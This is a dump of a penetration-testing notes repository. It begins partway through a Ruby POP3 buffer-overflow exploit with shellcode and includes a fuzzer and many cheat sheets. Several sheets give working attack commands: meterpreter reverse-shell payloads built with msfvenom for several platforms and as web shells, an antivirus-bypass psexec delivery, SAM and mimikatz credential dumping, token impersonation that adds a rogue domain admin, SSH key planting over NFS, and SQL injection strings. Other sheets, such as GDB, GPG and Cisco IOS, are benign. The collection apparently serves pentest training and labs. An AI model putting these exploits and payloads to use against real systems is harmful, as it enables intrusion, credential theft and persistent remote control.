"\x3e\xe3\xb3\xb0\xbc\x01\x4c\x47\xdc\x60\x49\x03\x5a\x99\x23"+ 48 | "\x1c\x0f\x9d\x90\x1d\x1a" 49 | 50 | #create padding 51 | padding = "C" * (3500 - 2606 - 4 - 16 - 351) 52 | 53 | #assemble payload 54 | payload = buffer + eip + encoder_buffer + shellcode + padding 55 | 56 | 57 | #send payload 58 | puts "sending payload..." 59 | socket = Socket.tcp("10.11.13.62", 110) 60 | socket.gets.chomp 61 | socket.write("USER test\r\n") 62 | socket.gets.chomp 63 | socket.write("PASS #{payload} \r\n") 64 | socket.write("QUIT\r\n") 65 | socket.close 66 | puts "payload sent... socket closed..." 67 | exit(0) 68 | -------------------------------------------------------------------------------- /buffer_overflow/scripts/windows_bo_fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | #create an array of buffers, while incrementing them 5 | 6 | buffer=["A"] 7 | counter=100 8 | while len(buffer) <=30: 9 | buffer.append("A"*counter) 10 | counter=counter+200 11 | 12 | for string in buffer: 13 | print "Fuzzing PASS with %s bytes" % len(string) 14 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | connect=s.connect(('10.11.13.62',110)) 16 | s.recv(1024) 17 | s.send('USER test\r\n') 18 | s.recv(1024) 19 | s.send('PASS ' + string + '\r\n') 20 | s.send('QUIT\r\n') 21 | s.close() 22 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_AIXBuild.txt: -------------------------------------------------------------------------------- 1 | loslevel: 2 | -------- 3 | 4 | Reports back on installed service pack, maintenance etc. levels of the AIX deployment. 5 | Most of these appear to return absolutely nothing or loads of information. 6 | 7 | oslevel (reports back the overall AIX version e.g. 
6.1.0.0) 8 | oslevel -q (reports back known maintenance levels on the host) 9 | oslevel -rq (reports back known Recommended Maintenance Levels, think major releases) 10 | oslevel -sq (reports back known Service Packs - has returned a load of service pack numbers for me, these are useful when looking at products in relation to the service pack) 11 | 12 | e.g. 13 | oslevel -s -g 6100-08-03-1339 14 | 15 | lslpp: 16 | ------ 17 | 18 | Displays information about installed filesets/software and updates. It's particularly useful when coupled with the information returned by itself 19 | 20 | e.g. 21 | lslpp -l (lists all packages, most recent level and state of them) 22 | The package names can be passed back to it for more info, showing their patch management/application cycle. 23 | 24 | e.g. 25 | lslpp -h bos.rte - returns information regarding the updates applied to the Base Operating System package. bos.rte 26 | 27 | rpm: 28 | ---- 29 | 30 | Standard redhat package manager, has turned up on a few machines. 31 | 32 | rpm -qa 33 | rpm -qa --last 34 | These will report back packages installed by rpm and when. 35 | 36 | Other than those, it's the same combination of looking through directories and permissions on files. I usually end up checking through with "find" and the "-perm" flag: 37 | e.g. find /home/ -perm 777 38 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_AVBypass.txt: -------------------------------------------------------------------------------- 1 | 1. Generate executable using Veil. 2 | 3 | 2. 
In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp) 4 | 5 | msf > use exploit/windows/smb/psexec 6 | msf exploit(psexec) > set RHOST 192.168.0.2 7 | RHOST => 192.168.0.2 8 | msf exploit(psexec) > set SMBUser user 9 | SMBUser => user 10 | msf exploit(psexec) > set SMBPass pass 11 | SMBPass => pass 12 | msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe 13 | EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe 14 | msf exploit(psexec) > exploit -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_ApacheSSL.txt: -------------------------------------------------------------------------------- 1 | # Enabling Self signed certificates on local website 2 | 3 | 1. Install OpenSSL 4 | 5 | sudo apt-get install openssl 6 | 7 | 2. Run the following command to generate the self signed SSL certificates: 8 | 9 | sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key 10 | 11 | 3. Enable SSL for Apache 12 | 13 | sudo a2enmod ssl 14 | 15 | 4. Put the default-ssl site available creating a symbolic link 16 | 17 | sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf 18 | 19 | 5. Edit the file default-ssl.conf 20 | 21 | sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf 22 | 23 | Change the following lines to point to the certs: 24 | 25 | SSLCertificateFile /etc/ssl/certs/server.crt 26 | SSLCertificateKeyFile /etc/ssl/private/server.key 27 | 28 | 6. 
Restart Apache 29 | 30 | sudo /etc/init.d/apache2 restart 31 | 32 | More information: 33 | https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/ 34 | https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html 35 | http://www.akadia.com/services/ssh_test_certificate.html 36 | https://www.sslshopper.com/apache-server-ssl-installation-instructions.html 37 | http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_AttackingMSSQL.txt: -------------------------------------------------------------------------------- 1 | [+] Attacking MSSQL with Metasploit 2 | 3 | [>] Enumerate MSSQL Servers on the network: 4 | 5 | msf > use auxiliary/scanner/mssql/mssql_ping 6 | nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156 7 | Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio. 
8 | 9 | [>] Bruteforce MSSQL Database: 10 | 11 | msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login 12 | 13 | [>] Enumerate MSSQL Database: 14 | 15 | msf > use auxiliary/admin/mssql/mssql_enum 16 | 17 | [>] Gain shell using gathered credentials 18 | 19 | msf > use exploit/windows/mssql/mssql_payload 20 | msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp 21 | 22 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_CTF.txt: -------------------------------------------------------------------------------- 1 | CTF Notes 2 | --------- 3 | 4 | # Enumerate Users via Finger 5 | finger user@192.168.0.20 6 | 7 | # Show nfs shares available 8 | showmount -e 192.168.1.54 9 | 10 | # User nfspysh to mount share and create .ssh directory 11 | nfspysh -o server=192.168.0.20:/home/user 12 | mkdir .ssh 13 | cd .ssh 14 | 15 | # Generate ssh key pair 16 | ssh-keygen 17 | cp id_rsa.pub /tmp/authorized_keys 18 | 19 | # Transfer attacker public key to host 20 | put /tmp/authorized_keys 21 | exit 22 | 23 | # Login to SSH server with no password 24 | SSH_AUTH_SOCK=0 ssh user@192.168.0.20 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_CiscoIOS.txt: -------------------------------------------------------------------------------- 1 | Cisco IOS Command Line Cheatsheet 2 | --------------------------------- 3 | 4 | --- Verify Basic Configuration: 5 | 6 | Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc. 7 | SW1# show version 8 | 9 | Shows the current configuration file stored in DRAM. 10 | SW1# show running-config 11 | 12 | Shows the configuration file stored in NVRAM which is used at first boot process. 13 | SW1# show startup-config 14 | 15 | Lists the commands currently held in the history buffer. 
16 | SW1# show history 17 | 18 | Shows an overview of all interfaces, their physical status, protocol status and ip address if assigned. 19 | SW1# show ip interface brief 20 | 21 | Shows detailed information about the specified interface, its status, protocol, duplex, speed, encapsulation, last 5 min traffic. 22 | SW1# show interface vlan 1 23 | 24 | Shows the description of all interfaces 25 | SW1# show interfaces description 26 | 27 | Shows the status of all interfaces like connected or not, speed, duplex, trunk or access vlan. 28 | SW1# show interfaces status 29 | 30 | Shows the public encryption key used for SSH. 31 | SW1# show crypto key mypubkey rsa 32 | 33 | Shows information about the leased IP address (when an interface is configured to get IP address via a dhcp server) 34 | SW1# show dhcp lease 35 | 36 | --- Router Modes: 37 | 38 | Router>: User mode = Limited to basic monitoring commands 39 | Router#: Privileged mode (exec-level mode) = Provides access to all other router commands 40 | Router(config)#: global configuration mode = Commands that affect the entire system 41 | Router(config-if)#: interface mode = Commands that affect interfaces 42 | Router(config-subif)#: subinterface mode = Commands that affect subinterfaces 43 | Router(config-line)#: line mode = Commands that affect in lines modes (console, vty, aux…) 44 | Router(config-router)#: router configuration mode 45 | 46 | --- Changing switch hostname: 47 | 48 | Switch(config)# hostname SW1 49 | 50 | --- Configuring passwords: 51 | 52 | SW1(config)# enable secret cisco ! MD5 hash 53 | SW1(config)# enable password notcisco ! 
Clear text 54 | 55 | --- Securing console port: 56 | 57 | SW1(config)# line con 0 58 | SW1(config-line)# password cisco 59 | SW1(config-line)# login 60 | 61 | --- Securing terminal lines: 62 | 63 | SW1(config)# line vty 0 4 64 | SW1(config-line)# password cisco 65 | SW1(config-line)# login 66 | 67 | --- Encrypting passwords: 68 | 69 | SW1(config)# service password-encryption ! Type 7 obfuscation only, which is trivially reversible; it hides line passwords from casual viewing of the config but is not a substitute for enable secret 70 | 71 | --- Configuring banners: 72 | 73 | SW1(config)# banner motd $ 74 | -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 75 | UNAUTHORIZED ACCESS IS PROHIBITED 76 | -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 77 | $ 78 | 79 | --- Giving the switch an IP address: 80 | 81 | SW1(config)# interface vlan 1 82 | SW1(config-if)# ip address 172.16.1.11 255.255.255.0 ! or DHCP 83 | SW1(config-if)# no shutdown 84 | 85 | --- Setting the default gateway: 86 | 87 | SW1(config)# ip default-gateway 172.16.1.1 88 | 89 | --- Saving configuration: 90 | 91 | SW1# copy running-config startup-config 92 | Destination filename [startup-config]? ! Press enter to confirm file name. 93 | Building configuration… 94 | [OK] 95 | 96 | ! Short for write memory.
97 | SW1# wr 98 | Building configuration… 99 | [OK] -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_CookieStealing.txt: -------------------------------------------------------------------------------- 1 | [+] Cookie Stealing: 2 | 3 | [-] Start Web Service 4 | 5 | python -m SimpleHTTPServer 80 6 | 7 | [-] Use one of the following XSS payloads: 8 | 9 | 10 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_DomainAdminExploitation.txt: -------------------------------------------------------------------------------- 1 | [+] After compromising a Windows machine: 2 | 3 | [>] List the domain administrators: 4 | From Shell - net group "Domain Admins" /domain 5 | 6 | [>] Dump the hashes (Metasploit) 7 | msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE 8 | 9 | [>] Find the admins (Metasploit) 10 | spool /tmp/enumdomainusers.txt 11 | msf > use auxiliary/scanner/smb/smb_enumusers_domain 12 | msf > set smbuser Administrator 13 | msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 14 | msf > set rhosts 10.10.10.0/24 15 | msf > set threads 8 16 | msf > run 17 | 18 | msf> spool off 19 | 20 | [>] Compromise Admin's box 21 | meterpreter > load incognito 22 | meterpreter > list_tokens -u 23 | meterpreter > impersonate_token MYDOM\\adaministrator 24 | meterpreter > getuid 25 | meterpreter > shell 26 | 27 | C:\> whoami 28 | mydom\adaministrator 29 | C:\> net user hacker /add /domain 30 | C:\> net group "Domain Admins" hacker /add /domain -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_ExploitDev.txt: -------------------------------------------------------------------------------- 1 | Exploit Development Cheatsheet 2 | ------------------------------ 3 | 4 | [+] Fuzzing: 5 | 6 | import socket 7 | 8 | buffer = ["A"] 9 | counter = 50 10 | 11 | while len(buffer) <= 1000: 12 | 
buffer.append("A" * counter) 13 | counter = counter + 50 14 | 15 | for buffstring in buffer: 16 | print "Fuzzing:" + str(len(buffstring)) 17 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | sock.connect( ("192.168.0.20", 5555) ) 19 | sock.send(buffstring) 20 | sock.close() 21 | 22 | 23 | [+] Bad Character Testing: 24 | 25 | "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e" 26 | "\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d" 27 | "\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c" 28 | "\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b" 29 | "\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a" 30 | "\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59" 31 | "\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68" 32 | "\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77" 33 | "\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86" 34 | "\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95" 35 | "\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4" 36 | "\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3" 37 | "\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2" 38 | "\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1" 39 | "\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 40 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef" 41 | "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe" 42 | "\xff" 43 | 44 | 45 | [+] Structured Exception Handler (SEH) Exploitation notes 46 | 47 | - Crash the application 48 | - Check SEH overwrite (view-seh chain) 49 | - Find offset (!mona pattern_create ) 50 | - Find certain SEH references to the cyclic pattern (!mona findmsp) 51 | - Verify offset to NSEH (Next Exception) 52 | - Find POP/POP/RET address with mona (!mona seh -cpb ) 53 | - Add short jump into payload to jump over SEH ("\xeb\x06" + 2 bytes of padding) 54 | - Add shellcode to the payload
55 | - Ensure enough padding remains so that the crash still happens. -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_GDB.txt: -------------------------------------------------------------------------------- 1 | set disassembly-flavor intel 2 | 3 | $ cat ~/.bash_aliases | grep gdb 4 | alias gdb='gdb -quiet' 5 | 6 | Running gdb 7 | ------------------ 8 | $ gdb - run, then use file command to load object 9 | $ gdb -quiet - suppress copyright information 10 | $ gdb object - normal debug 11 | $ gdb object core - analyze core dump 12 | $ gdb object pid - attach to running process 13 | 14 | General commands 15 | ------------------ 16 | set args - set program arguments 17 | show args - show program arguments 18 | run - run the program 19 | run < file - run with input from file 20 | set follow-exec-mode new/same - set debugger response to an exec call 21 | set write - set write into executables 22 | set write off - unset write into executables 23 | continue - continue running until break 24 | finish - execute until current stack frame ends 25 | source FILE - read commands from script file 26 | shell [cmd] - run cmd in a shell 27 | display /5i $eip - display expression every time execution stops 28 | undisplay - undisplay expression number 29 | info functions - list all the functions 30 | info variables - list all the variables 31 | info registers - list most common registers 32 | info all-registers - list all registers 33 | info display - print the list of displayed expressions 34 | backtrace - print backtrace of all stack frames 35 | where - same as backtrace 36 | set disassembly-flavor intel - set disassembly style to intel/att 37 | define hook-[cmd] - actions to execute before command 38 | define hookpost-[cmd] - actions to execute after command 39 | define hook-stop - actions to execute when execution stops 40 | 41 | Breakpoints 42 | ------------------ 43 | info breakpoints - list all breakpoints 44 | break [func] -
break function name 45 | break *[addr] - break at address 46 | delete [bnum] - delete breakpoint bnum 47 | break if [cond] - break if condition 48 | ignore [bnum] [count] - ignore breakpoint bnum count times 49 | condition [bnum] $eax == 0x22 - add condition for breakpoint 1 50 | condition [bnum] - delete condition for breakpoint 1 51 | 52 | Watchpoints 53 | ------------------ 54 | info watchpoints - list all the watchpoint 55 | watch variable==value - break when variable equals .. 56 | watch $eax == 0x0000ffaa - break when register equals .. 57 | rwatch *[addr] - break on read memory location 58 | awatch *[addr] - break on read/write memory location -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_GPG.txt: -------------------------------------------------------------------------------- 1 | Encrypt 2 | ------------ 3 | sudo gpg -e ~/Desktop/file.doc 4 | 5 | This will prompt you to type in the persons name (public key) to encrypt with. 6 | 7 | Decrypt 8 | ----------- 9 | sudo gpg -d ~/Desktop/file.doc.pgp > ~/Desktop/file.doc 10 | 11 | 12 | Import other users' public keys by using: 13 | 14 | sudo gpg --import -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_HTTPBasicAuth.txt: -------------------------------------------------------------------------------- 1 | [>] HTTP Basic Authentication Dictionary and Brute-force attacks with Burp Suite 2 | 3 | http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/ 4 | 5 | Burp Suite against HTTP Basic authentication 6 | 7 | To implement the attack you need to capture one authentication request with Burp Proxy and send it to Burp Intruder. 8 | 9 | Mark only the Base64 encoded string and click Add button to put the markers around it. 10 | 11 | Dictionary attack 12 | 13 | For the dictionary attack I’m using custom iterator intruder option. 
It allows you to generate your own custom payload string consisting of several substrings. For every substring you can specify a separator, which is basically a suffix. The Intruder calls those substrings “positions”. 14 | Following this logic, in position 1 we would like to load a username followed by the separator (a semicolon) and then load a password for position 2. 15 | Go to Payload tab and select Custom iterator option from Payload type dropdown box. 16 | Burp Suite Custom Iterator 17 | Select position 1 from the Position dropdown box and load your usernames list in List items for position 1 listbox. Put a semicolon in the Separator for position 1 text box. 18 | Position 1 list and separator option 19 | Select position 2 from the Position dropdown box and load your passwords list in List items for position 2 listbox. 20 | Position 2 21 | After you’ve set your two positions you need to tell the Intruder to encode the payload string using Base64 encoding. Go to Payload processing sections and click Add button. Select Payload encoding option and then Base64. 22 | PayloadProcessin_AddRule_Encode 23 | PayloadProcessingEncode 24 | By default Burp Intruder URL encodes the payload. Base64 strings often contain the = symbol. That is why it is a good idea to exclude it from the list of URL characters for encoding. 25 | That’s it. You can start the Intruder attack. 26 | 27 | Bruteforce attack 28 | 29 | The method I’m using for the bruteforce attack is targeting only one username per Intruder attack. 30 | Select Brute forcer from the Payload type dropdown and then set the length of the password and the characterset you would like the Intruder to use while constructing the password strings. 31 | Burp Intruder Brute forcer 32 | In order to specify the username you would like to brute-force you need to set a Payload processing rule. Add a new rule with Add prefix type and fill in the username followed by a semicolon.
33 | Burp Intruder Add Prefix 34 | Add another rule to encode the payload using Base64. And finally remove = from the list of symbols subject of URL encoding. 35 | Burp Sutei Bruteforce Attack Settings 36 | Done! You can start the Intruder attack! 37 | 38 | [>] Automated Security Analyser for ASP.NET Websites 39 | 40 | https://asafaweb.com -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_LocalSamDump.txt: -------------------------------------------------------------------------------- 1 | fdisk -l 2 | 3 | mount -t ntfs /dev/sda1 /mnt 4 | 5 | df -k 6 | 7 | cd /mnt 8 | ls 9 | cd WINDOWS/system32/config 10 | 11 | ls 12 | bkhive system /root/hive.txt 13 | samdump2 SAM /root/hive.txt > /root/hash.txt 14 | 15 | john /root/hash.txt -format=nt2 -users=Administrator 16 | cd /root/.john 17 | ls -l 18 | cat john.pot -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_MSFPostExploitation.txt: -------------------------------------------------------------------------------- 1 | [+] Meterpreter Shell 2 | 3 | meterpreter > sysinfo 4 | 5 | meterpreter > getuid 6 | 7 | meterpreter > getsystem 8 | 9 | meterpreter > hashdump 10 | 11 | meterpreter > load/use mimikatz 12 | 13 | kerberos Attempt to retrieve kerberos creds 14 | livessp Attempt to retrieve livessp creds 15 | mimikatz_command Run a custom commannd 16 | msv Attempt to retrieve msv creds (hashes) 17 | ssp Attempt to retrieve ssp creds 18 | tspkg Attempt to retrieve tspkg creds 19 | wdigest Attempt to retrieve wdigest creds 20 | 21 | meterpreter > wdigest 22 | 23 | meterpreter > use incognito 24 | meterpreter > list_tokens -u 25 | meterpreter > impersonate_token SERV-2K3\\Administrator 26 | execute -f cmd.exe -i -t -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Metasploit.pdf: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/Cheatsheet_Metasploit.pdf -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_MetasploitPayloads.txt: -------------------------------------------------------------------------------- 1 | [+] Creating Metasploit Payloads 2 | 3 | List payloads 4 | msfvenom -l 5 | 6 | Binaries 7 | 8 | Linux 9 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf 10 | 11 | Windows 12 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe 13 | 14 | Mac 15 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho 16 | 17 | 18 | Web Payloads 19 | 20 | PHP 21 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php 22 | cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php 23 | 24 | ASP 25 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 26 | 27 | JSP 28 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 29 | 30 | WAR 31 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 32 | 33 | 34 | Scripting Payloads 35 | 36 | Python 37 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 38 | 39 | Bash 40 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 41 | 42 | Perl 43 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 44 | 45 | 46 | Shellcode 47 | 48 | For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. 
49 | 50 | Linux Based Shellcode 51 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 52 | 53 | Windows Based Shellcode 54 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 55 | 56 | Mac Based Shellcode 57 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 58 | 59 | 60 | Handlers 61 | 62 | Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. 63 | 64 | use exploit/multi/handler 65 | set PAYLOAD 66 | set LHOST 67 | set LPORT 68 | set ExitOnSession false 69 | exploit -j -z 70 | 71 | Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ 72 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_MobileAppTesting.txt: -------------------------------------------------------------------------------- 1 | http://pen-testing.sans.org/blog/pen-testing/2013/12/02/mobile-device-tips-tricks-and-resources 2 | 3 | ------------------------------------------ Mobile Application Test Notes (iPhone) 4 | 5 | 6 | Prepping Device and Application: 7 | 8 | [+] Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04 9 | [+] Enable SSH on iPhone/iPad 10 | [+] Install iFunbox to install the application (http://www.i-funbox.com) 11 | [+] Connect device to lab wireless network 12 | [+] Add web proxy settings - IP address of attacking machine port 8080 13 | [+] Ensure connection and SSH is working 14 | 15 | 16 | Prepping Burp Suite: 17 | 18 | [+] Open Burp Suite and navigate to Proxy->Options, 19 | [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’. 20 | 21 | [+] Download and install burp certificate (.crt) onto ipad. 
22 | 23 | Mobile Application Penetration Testing: 24 | 25 | [+] Browse the following Directory for insecure storage 26 | [-] /private/var/mobile/applications/ 27 | 28 | 29 | Notes: 30 | 31 | [+] Application file type - x.ipa 32 | 33 | [+] Easy way: 34 | 35 | - Place attacking machine and apple device on wireless network with app installed. 36 | - Email burps .cer to apple device and install 37 | - Start burp and disable firewall on listening machine. 38 | - Change proxy settings on apple device to point to listening burp machine/port. 39 | 40 | 41 | ------------------------------------------ Mobile Application Test Notes (Android) 42 | 43 | [+] Create a virtual device: 44 | [-] android avd 45 | 46 | [+] Start the emulator: 47 | [-] emulator –avd testavd 48 | 49 | [+] Install the application: 50 | [-] adb install 51 | 52 | [+] Open Burp Suite and navigate to Proxy->Options, 53 | [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’. 54 | 55 | [+] Start the emulator and proxy: 56 | [-] emulator –avd testavd –http-proxy http://localhost:8080 57 | 58 | [+] Download and install burp certificate (.crt) onto the emulator using the push shell command. 
59 | 60 | 61 | Notes: 62 | 63 | [+] Application file type - x.apk 64 | 65 | Install Certs: http://www.realmb.com/droidCert/ 66 | SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp 67 | 68 | http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Networking.txt: -------------------------------------------------------------------------------- 1 | Useful Networking Cheatsheet 2 | ---------------------------- 3 | 4 | [+] Setting up an Ethernet bridge in Ubuntu/Kali Linux 5 | 6 | # Install bridge-utils 7 | sudo apt-get install bridge-utils 8 | 9 | # Disable network-manager + firewall 10 | 11 | # Configuration 12 | 13 | ifconfig 14 | ifconfig eth0 0.0.0.0 15 | ifconfig eth1 0.0.0.0 16 | brctl addbr br0 17 | brctl addif br0 eth0 18 | brctl addif br0 eth1 19 | ifconfig br0 up 20 | dhclient br0 21 | 22 | sudo tcpdump -i br0 -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Oracle.txt: -------------------------------------------------------------------------------- 1 | Oracle Penetration Testing 2 | -------------------------- 3 | 4 | Tools within Kali: 5 | 6 | oscanner 7 | root@kali:~# oscanner -s 192.168.1.15 -P 1040 8 | 9 | sidguess 10 | root@kali:~# sidguess -i 192.168.1.205 -d /usr/share/wordlists/metasploit/unix_users.txt 11 | 12 | tnscmd10g 13 | root@kali:~# tnscmd10g version -h 192.168.1.20 14 | 15 | Nmap 16 | nmap -p 1521 -A 192.168.15.205 17 | 18 | Nmap nse scripts 19 | Metasploit auxiliaries -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Pyinstaller.txt: -------------------------------------------------------------------------------- 1 | python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py 2 | 3 | [+] Generate the 
.spec file. 4 | [+] Windows: (You want a single EXE file with your data in it, hence --onefile). 5 | 6 | python pyinstaller.py --onefile your_main_file.py 7 | 8 | [+] Rebuild your package. 9 | 10 | python pyinstaller.py your_main_file.spec 11 | 12 | [+] Look for your .exe or your .app bundle in the dist directory. -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Python.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/Cheatsheet_Python.pdf -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Remediations.txt: -------------------------------------------------------------------------------- 1 | [+] Weak SSH Ciphers 2 | 3 | sudo nano /etc/ssh/sshd_config 4 | 5 | Add the following lines: 6 | 7 | Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour 8 | MACs hmac-sha1,hmac-ripemd160 (note: the arcfour* entries are RC4 and hmac-sha1/hmac-ripemd160 are themselves reported as weak by current scanners; where the server's OpenSSH version supports them, keep only the aes*-ctr ciphers and use hmac-sha2-256,hmac-sha2-512 for MACs) 9 | 10 | Restart SSH 11 | 12 | 13 | [+] Unquoted Service Paths 14 | 15 | Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services 16 | Find the service in question and simply add a double quote on either side of the ImagePath string. 17 | 18 | Check permissions: 19 | C:\Users\user>icacls "C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe"
NBTSCAN 4 | 5 | root@bt:~# nbtscan -r 10.0.2.0/24 6 | Doing NBT name scan for addresses from 10.0.2.0/24 7 | 8 | IP address NetBIOS Name Server User MAC address 9 | ------------------------------------------------------------------------------ 10 | 10.0.2.0 Sendto failed: Permission denied 11 | 10.0.2.10 12 | 10.0.2.15 METASPLOITABLE METASPLOITABLE 00-00-00-00-00-00 13 | 10.0.2.18 TEST01 TEST01 00-11-21-22-1d-4d 14 | 10.0.2.45 TEST04 TEST04 00-12-d2-34-11-55 15 | 16 | 2. NMAP 17 | 18 | nmap -p 1-65535 -T4 -O -A -v 10.0.2.15 19 | 20 | 3. SMBCLIENT 21 | 22 | root@bt:~# smbclient -L=10.0.2.15 23 | 24 | Null Sessions 25 | 26 | root@bt:~# smbclient \\\\10.0.2.15\\tmp 27 | Enter root's password: 28 | Anonymous login successful 29 | 30 | 31 | SMB Enumeration Techniques using Windows Tools: 32 | 33 | 1. NetBIOS Enumerator (nbtenum) 34 | 35 | http://nbtenum.sourceforge.net/ -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_SMTPOpenRelay.txt: -------------------------------------------------------------------------------- 1 | [+] SMTP Open Relay Commands 2 | 3 | [-] ncat -C 86.54.23.178 25 4 | [-] HELO mail.co.uk 5 | [-] MAIL FROM: 6 | [-] RCPT TO: 7 | [-] DATA 8 | Test Email -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_SQLInjection.txt: -------------------------------------------------------------------------------- 1 | [+] Union Based SQL Injection 2 | 3 | ' or 1=1# 4 | 5 | 1' ORDER BY 10# 6 | 7 | 1' UNION SELECT 